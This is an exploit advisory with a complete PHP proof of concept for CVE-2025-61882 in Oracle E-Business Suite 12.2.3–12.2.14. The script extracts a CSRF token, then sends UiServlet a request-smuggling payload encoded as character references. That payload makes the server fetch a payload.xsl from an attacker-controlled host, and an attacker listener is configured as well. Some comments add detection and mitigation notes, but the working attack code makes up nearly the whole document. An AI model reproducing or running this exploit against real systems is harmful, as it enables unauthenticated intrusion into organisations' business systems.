Oracle E-Business Suite 12.2.3 Request Smuggling
=============================================================================================================================================
| # Title Oracle E-Business Suite 12.2.3 Request Smuggling
=============================================================================================================================================
| # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/applications/ebusiness/ |
=============================================================================================================================================
[+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882
[+] Summary: This script is a refined proof-of-concept targeting Oracle E-Business Suite (EBS) vulnerability CVE-2025-61882.
It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization.
The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body.
Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure.
The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.
[+] POC : php poc.php
<?php
/**
 * Proof-of-concept HTTP client for CVE-2025-61882 (Oracle E-Business Suite), as published.
 *
 * Request sequence produced by this class:
 *   1. POST /OA_HTML/JavaScriptServlet with the headers CSRF-XHR, FETCH-CSRF-TOKEN and
 *      X-Requested-With, to read a CSRF token from the response.
 *   2. POST /OA_HTML/configurator/UiServlet with the form fields redirectFromJsp, getUiType
 *      and oa_csrf_token. getUiType holds an <initialize> XML document whose return_url
 *      parameter carries an encoded chunk terminator followed by a second GET request.
 * Neither request carries a session cookie or any credential.
 *
 * Detection notes (every value named here is a literal in this listing):
 *   - POSTs to the two servlet paths above, in that order, from one client;
 *   - a return_url value made of long runs of numeric character references (&#NN;);
 *   - the inner request's User-Agent "Oracle-Internal/1.0" and its request for a .xsl path.
 * NOTE(review): form values are URL-encoded by http_build_query(), so log or WAF matching
 * has to run on the decoded getUiType value.
 * NOTE(review): the final log line suggests the EBS host is then expected to fetch the .xsl
 * file from srvHost:srvPort; if so, outbound HTTP from the application tier is a further
 * signal. Confirm against the vendor advisory.
 *
 * Mitigation: install Oracle's fix for CVE-2025-61882. Limiting external exposure of the
 * servlet paths and outbound connections from the EBS tier reduces reachability.
 */
class OracleEBSCVE202561882Exploit {
// Target host; the constructor reduces a full URL to its host component.
private $target;
// Overwritten by the constructor whenever 'target' is set and parse_url() succeeds.
private $targetPort = 8000;
// Host and port used to build the payload.xsl URL in exploit().
private $srvHost;
private $srvPort;
// Stored from the options but not read by any method of this class.
private $lhost;
private $lport;
// Assigned from the options; no method of this class reads it.
private $verbose = false;
// Declared but never used in this class.
private $cookies = [];
// Sent on every outer request. The string is fixed, so it is a usable (if weak) log indicator.
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $useHttps = false;
/**
 * Copies the option values into the object and splits 'target' into scheme, host and port.
 *
 * @param array $options Keys read: target, lhost, lport, srvHost (default '127.0.0.1'),
 *                       srvPort (default 8080), verbose (default false).
 */
public function __construct($options) {
$this->target = $options['target'] ?? null;
$this->lhost = $options['lhost'] ?? null;
$this->lport = $options['lport'] ?? null;
$this->srvHost = $options['srvHost'] ?? '127.0.0.1';
$this->srvPort = $options['srvPort'] ?? 8080;
$this->verbose = $options['verbose'] ?? false;
if ($this->target) {
$parsed = parse_url($this->target);
if ($parsed !== false) {
// A missing scheme is treated as plain http.
$scheme = $parsed['scheme'] ?? 'http';
$this->useHttps = ($scheme === 'https');
// Without a host component the original 'target' string is kept unchanged.
$this->target = $parsed['host'] ?? $this->target;
// Falls back to 443/80, so the 8000 property default applies only when
// 'target' is empty or parse_url() returns false.
$this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
}
}
}
/**
 * Requests a CSRF token from /OA_HTML/JavaScriptServlet.
 *
 * Sends an empty-body POST and asks httpRequest() for the response headers as well as the
 * body, then looks for the token in a X-ORACLE-DBC-CSRF-TOKEN header first and in a
 * "csrfToken" JSON member second.
 *
 * @return string|false The token, or false when neither pattern matches.
 */
private function retrieveCsrfTokenImproved() {
$url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
// This header trio on a bodiless POST is what a log search for step 1 would key on.
$headers = [
'CSRF-XHR: YES',
'FETCH-CSRF-TOKEN: 1',
'X-Requested-With: XMLHttpRequest'
];
// httpRequest() returns curl_exec()'s result unchecked, which is false on transport failure.
$response = $this->httpRequest('POST', $url, '', $headers, true);
// Header form: letters, digits and hyphens only, matched case-insensitively.
if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
return trim($m[1]);
}
// Body form: any run of non-quote characters inside the JSON string.
if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
return $m[1];
}
return false;
}
/**
 * Builds the encoded string that exploit() appends to the return_url parameter.
 *
 * The plain text is a zero-length chunk terminator ("0" plus two CRLF pairs) followed by a
 * complete GET request for the path of $xslUrl, which is then passed through
 * encodeSmugglePayload().
 *
 * @param string $xslUrl URL whose host and path are copied into the inner request;
 *                       missing parts default to srvHost and '/payload.xsl'.
 * @return string Encoded payload.
 */
private function createSmugglePayloadImproved($xslUrl) {
$parsedXsl = parse_url($xslUrl);
$xslHost = $parsedXsl['host'] ?? $this->srvHost;
$xslPath = $parsedXsl['path'] ?? '/payload.xsl';
$smuggled = "GET {$xslPath} HTTP/1.1\r\n";
$smuggled .= "Host: {$xslHost}\r\n";
// Fixed User-Agent of the inner request; distinct from the outer $userAgent.
$smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
$payload = "0\r\n\r\n";
$payload .= $smuggled;
return $this->encodeSmugglePayload($payload);
}
/**
 * Rewrites every byte except CR and LF as a decimal numeric character reference.
 *
 * The output is an unbroken run of "&#NN;" tokens with raw CR/LF bytes between lines.
 *
 * @param string $payload Text to encode; processed byte by byte.
 * @return string Encoded text.
 */
private function encodeSmugglePayload($payload) {
$encoded = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i++) {
$c = $payload[$i];
if ($c === "\r" || $c === "\n") {
// Line terminators are copied through unencoded.
$encoded .= $c;
} else {
$encoded .= '&#' . ord($c) . ';';
}
}
return $encoded;
}
/**
 * Runs the two-request sequence: token retrieval, then the UiServlet POST.
 *
 * The UiServlet response is discarded and the final "success" line is printed
 * unconditionally, so the output says nothing about whether the target is affected.
 *
 * @return void
 */
public function exploit() {
$this->log("Attempting to retrieve CSRF token...", "info");
$token = $this->retrieveCsrfTokenImproved();
if (!$token) {
// Only a warning is logged; the second request is still sent with $token === false.
$this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
}
// Always plain http, regardless of the scheme used for the target.
$xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
$smuggleData = $this->createSmugglePayloadImproved($xslUrl);
$xml = "<?xml version='1.0' encoding='UTF-8'?>";
$xml .= "<initialize>";
// The encoded payload directly follows the fixed host name internal.ebs.local.
$xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
$xml .= "<param name='ui_type'>Applet</param>";
$xml .= "</initialize>";
$url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
// http_build_query() URL-encodes each value, including the whole XML document.
$postData = http_build_query([
'redirectFromJsp' => '1',
'getUiType' => $xml,
'oa_csrf_token' => $token
]);
$this->log("Sending smuggling payload to UiServlet...", "info");
// Return value ignored: no status code or body is inspected.
$this->httpRequest('POST', $url, $postData, [
'Content-Type: application/x-www-form-urlencoded'
]);
$this->log("Payload sent. Monitor your HTTP server and listener.", "success");
}
/**
 * Performs one HTTP request through cURL.
 *
 * @param string $method     HTTP method, passed as CURLOPT_CUSTOMREQUEST.
 * @param string $url        Absolute URL.
 * @param string $data       Request body; only attached when $method is 'POST'.
 * @param array  $headers    Extra header lines, appended after the User-Agent header.
 * @param bool   $returnFull When true, response headers are included in the returned string.
 * @return string|false Whatever curl_exec() returns; no error or status handling is done here.
 */
private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
// Peer certificate verification is switched off for every request.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_HEADER => $returnFull,
CURLOPT_HTTPHEADER => array_merge(
["User-Agent: {$this->userAgent}"],
$headers
)
]);
// No timeout options are set on the handle.
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Joins scheme, target host, target port and $path into an absolute URL.
 *
 * @param string $path Path beginning with '/'.
 * @return string Absolute URL; the port is always written explicitly.
 */
private function buildUrl($path) {
$scheme = $this->useHttps ? 'https' : 'http';
return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
}
/**
 * Prints one "[type] message" line to standard output.
 *
 * @param string $msg  Message text.
 * @param string $type Label shown in brackets (info, warning, success).
 * @return void
 */
private function log($msg, $type) {
echo "[{$type}] {$msg}\n";
}
}
// Example configuration; every address here is in the private 192.168.0.0/16 range (RFC 1918).
// 'lhost' and 'lport' are accepted by the constructor but not read by any method of the class.
$options = [
'target' => 'http://192.168.1.100:8000',
'lhost' => '192.168.1.50',
'lport' => 4444,
'srvHost' => '192.168.1.50',
'srvPort' => 8080
];
// Construction only parses the options; exploit() is the call that sends the HTTP requests.
$exploit = new OracleEBSCVE202561882Exploit($options);
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================